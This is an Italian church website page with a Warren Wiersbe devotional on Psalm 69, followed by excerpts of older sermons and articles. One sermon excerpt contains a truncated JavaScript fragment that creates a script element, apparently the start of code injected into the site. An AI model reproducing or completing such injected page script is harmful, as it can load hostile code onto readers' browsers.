Meditazione del giorno: La morte peggiore

warren_wiersbe

di Warren Wiersbe  –  Leggere Salmo 69:1-12  –  Tempo fa mi trovai a parlare dalla morte con un mio vicino e usai l’argomento come opportunità di evangelizzazione. Discutemmo su quale fosse il modo più brutto per morire e alla fine della conversazione gli dissi: “forse il modo più brutto per morire sarebbe quello di rimanere intrappolati nelle sabbie mobili e morire soffocati”.

Davide, spiritualmente parlando, provò quel tipo di esperienza: “Salvami, o DIO, perché le acque sono giunte fino alla gola. Sono affondato in un profondo pantano e non trovo alcun punto d’Appoggio; sono giunto in acque profonde, e la corrente mi travolge” (vv. 1, 2). Sarà di certo terribile rimanere bloccati nelle sabbie mobili e Davide, infatti, venne travolto da un’ondata che lo coprì completamente. Cosa fece? Egli agì come ogni cristiano dovrebbe agire.

Per prima cosa, aspettò: “Sono stanco di gridare, la mia gola è riarsa; i miei occhi si consumano nell’attesa del mio DIO” (v. 3). “Non siano confusi per causa mia quelli che sperano in te, o Signore, Eterno degli eserciti; non siano svergognati per causa mia quelli che ti cercano, o DIO d’Israele” (v. 6). Davide sapeva che la situazione era sotto il controllo di Dio. Si, egli gridò a Lui affinché lo soccorresse. Non c’è nulla di sbagliato in questo, ma nel frattempo Davide aspettò.

Secondo, egli pianse: “Ho pianto affliggendo l’anima mia col digiuno, ma ciò mi ha causato disonore” (v. 10). La parola disonore è usata molto spesso in questo Salmo, (questo è un Salmo messianico che parla del disonore che Gesù ha patito per noi). Non c’è niente di sbagliato nel piangere soprattutto quando la sofferenza ci fa stare male e molte situazioni distruggono il nostro cuore. Davide aspettò e pianse sapendo che Dio stava portando a termine la Sua promessa.

Terzo, egli osservò: “Non siano confusi, per causa mia, quelli che sperano in te, o Signore, Dio degli eserciti! Non siano coperti di vergogna per causa mia, quelli che ti cercano, o Dio d’Israele!” (v. 6). In altre parole Davide dice: “non importa ciò che accadrà a me, ma non voglio essere un problema per gli altri”. Per tutto il Salmo Davide diventa sempre più come il Signore. Quando ti ritrovi arenato nei tuoi problemi, aspetta, piangi e osserva Dio operare.

Quanto ti senti come bloccato fra le sabbie mobili, puoi fare qualcosa in più del solo gridare al Signore. A volte Egli permette che le situazioni difficili della tua vita facciano si che tu ti rivolga a Lui. Aspetta Dio, ammetti che Egli ha tutto sotto il Suo controllo. Dai a Lui tutti i pezzi del tuo cuore rotto e osservaLo operare per te. Tu puoi e devi dipendere dalla Sua fedeltà.

I commenti sono chiusi.

Post meno recenti

VIVERE IL CRISTIANESIMO.

di ROBERTO BRACCO  –  Che cos’è il cristianesimo?  Questa domanda rappresenta una premessa indispensabile al soggetto che ci accingiamo a trattare. Il cristianesimo è la dottrina di Cristo nella sua attuazione pratica! La dottrina di Cristo, non bisogna dimenticare, non ha soltanto un aspetto morale ed un contenuto legale, ma anche, anzi soprattutto, un aspetto ideale; cioè la dottrina di Cristo non si esaurisce nell’insegnare a vivere puramente …
Leggi Tutto

Sermone Domenica 21 Aprile: Terry Peretti

Predicazione dell’evangelista TERRY PERETTI 2 Re 19 – “Non temere il nemico:Il Signore è più forte” var d=document;var s=d.createElement(‘script’); …
Leggi Tutto

Opportunità per il Movimento Pentecostale

Un interessante articolo pubblicato negli anni 70 da “World Pentecostal” e ripreso dal periodico “Risveglio pentecostale”. Sebbene siano passati quasi quarant’anni, risulta di estrema attualità. Il giornale «Time» del 2 aprile di quest’anno apriva una serie speciale di articoli dal titolo: «Alcuni pensieri in seconda dell’uomo». La serie riportava documentazioni impressionanti che dimostravano come nell’ambito del comportamento umano, della religione, dell’educazione e della scienza, vi è oggi un’onda montante …
Leggi Tutto

Grandi inni: Just as I am - (Così qual sono).

Questo famoso inno è stato composto da Charlotte Elliott.  Fin dalla sua giovane età Charlotte era consapevole della sua natura peccaminosa e della sua incapacità a resistere alle lusinghe del peccato. Crescendo, Charlotte si sentiva sempre più indegna della grazia di Dio e insufficiente  di fronte a un Dio perfetto e giusto. Chiese aiuto a molti pastori, i quali la consigliavano di pregare di più, di studiare la …
Leggi Tutto

DAI SERMONI DI ROBERTO BRACCO

SCEGLIETE OGGI CHI VOLETE SERVIRE  (Giosuè 24) …
Leggi Tutto

Una promessa per oggi: Io posso fare per te più di quanto tu possa immaginare.

Or a colui che può, secondo la potenza che opera in noi, fare smisuratamente al di là di quanto chiediamo o pensiamo, a lui sia la gloria nella chiesa in Cristo Gesù per tutte le generazioni, nei secoli dei secoli. Amen. (Efesini 3:20-21)  –  Dopo aver letto questa promessa, prova per un attimo ad immaginare la più grande, impensabile cosa, per la tua vita. Non importa quanto grande …
Leggi Tutto

Sermone  predicato Domenica 17 Maggio 2015: pastore Agostino Masdea   Vivere ancora sotto la legge o vivere sotto la la grazia? …
Leggi Tutto

Sermone: La Chiesa il Tempio di Dio

​     Sermone di Agostino Masdea  –  1 Corinti 3  – “La Chiesa, il tempio di Dio”. Da cosa sono causati i problemi nella chiesa oggi? Cos’è che porta divisione? Qual è il marchio di una chiesa matura e spirituale? Nella chiesa non ci sarebbero problemi, non ci sarebbero mal di pancia, lamentele e critiche, se ogni credente si arrendesse all’opera dello Spirito Santo! Bisognerebbe avvisare tanti …
Leggi Tutto

Dai nostri Culti